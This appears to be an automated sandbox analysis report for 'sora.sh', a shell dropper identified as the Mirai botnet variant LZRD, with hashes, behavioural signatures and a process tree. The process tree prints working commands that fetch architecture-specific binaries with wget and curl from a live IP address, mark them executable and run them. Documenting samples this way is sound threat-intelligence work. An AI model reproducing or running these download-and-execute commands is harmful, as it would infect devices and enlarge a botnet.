Analysis
-
max time kernel
150s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
29-08-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
sora.sh
-
Size
1KB
-
MD5
4bad6b7a8f3a112f1e8a64415b2c5e57
-
SHA1
80386ebec3b511cd2a07da88e300a62590b8d889
-
SHA256
4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
-
SHA512
da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Contacts a large (19828) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/robben 744 robben /tmp/robben 752 robben /tmp/robben 763 robben /tmp/robben 774 robben /tmp/robben 796 robben /tmp/robben 823 robben /tmp/robben 831 robben /tmp/robben 849 robben /tmp/robben 873 robben /tmp/robben 879 robben -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-2.dat upx behavioral3/files/fstream-3.dat upx behavioral3/files/fstream-5.dat upx -
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/713/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/722/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/679/exe robben File opened for reading /proc/712/exe robben File opened for reading /proc/715/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/756/exe robben File opened for reading /proc/707/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/678/exe robben File opened for reading /proc/694/exe robben File opened for reading /proc/708/exe robben File opened for reading /proc/796/exe robben File opened for reading /proc/714/exe robben File opened for reading /proc/753/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/676/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/719/exe robben File opened for reading /proc/431/exe robben File opened for reading /proc/672/exe robben File opened for reading /proc/795/exe robben -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/robben sora.sh File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.x86 wget
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:715 -
/usr/bin/wgetwget http://154.216.17.67/bins/sora.x862⤵
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/catcat sora.x862⤵PID:742
-
-
/bin/chmodchmod +x robben sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:743
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mips2⤵
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mips2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/catcat sora.mips2⤵PID:750
-
-
/bin/chmodchmod +x robben sora.mips sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:751
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:752
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:759
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/catcat sora.mpsl2⤵PID:761
-
-
/bin/chmodchmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:762
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:763
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm42⤵PID:765
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/catcat sora.arm42⤵PID:771
-
-
/bin/chmodchmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:772
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:774
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm52⤵
- Writes file to tmp directory
PID:776
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/catcat sora.arm52⤵PID:793
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:794
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:796
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm62⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/catcat sora.arm62⤵PID:821
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:822
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:823
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm72⤵
- Writes file to tmp directory
PID:826
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/catcat sora.arm72⤵PID:829
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:830
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:831
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:833
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/catcat sora.ppc2⤵PID:846
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:847
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:849
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/catcat sora.m68k2⤵PID:871
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:872
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:873
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.sh42⤵
- Writes file to tmp directory
PID:875
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/catcat sora.sh42⤵PID:877
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k2⤵PID:878
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:879
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5bcff8f405bdd93b8488e6f6aca117a32
SHA18b32a1dea70be2c76830e3808f70ad62eb3b1250
SHA25667180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
SHA5125d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a
-
Filesize
31KB
MD5131fc41fbe66493277e3155f50b9fce5
SHA10bbb17cb882e34dc82e51862f8245f3187664beb
SHA256d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f
SHA512de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247
-
Filesize
33KB
MD58652e70ebc913d0078f59b2526a40d36
SHA11227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4
SHA256cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf
SHA512ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3
-
Filesize
212B
MD545e588171939a0780c48755918b1cd74
SHA16c33e64b1a43fb6752026fd1254cac740e7c3243
SHA256770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535
SHA512fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770
-
Filesize
27KB
MD500d6529558e66184baaf1b0f21e59739
SHA13b9db5227c48f501573ea9b626c5c765a17e7c61
SHA256fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d
SHA51249f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb
-
Filesize
71KB
MD5a0b83eba33da68f09402235338d316a8
SHA115f3e890997e3b7f21c16eb1b0462bdf4ed11d61
SHA256eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507
SHA5122346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79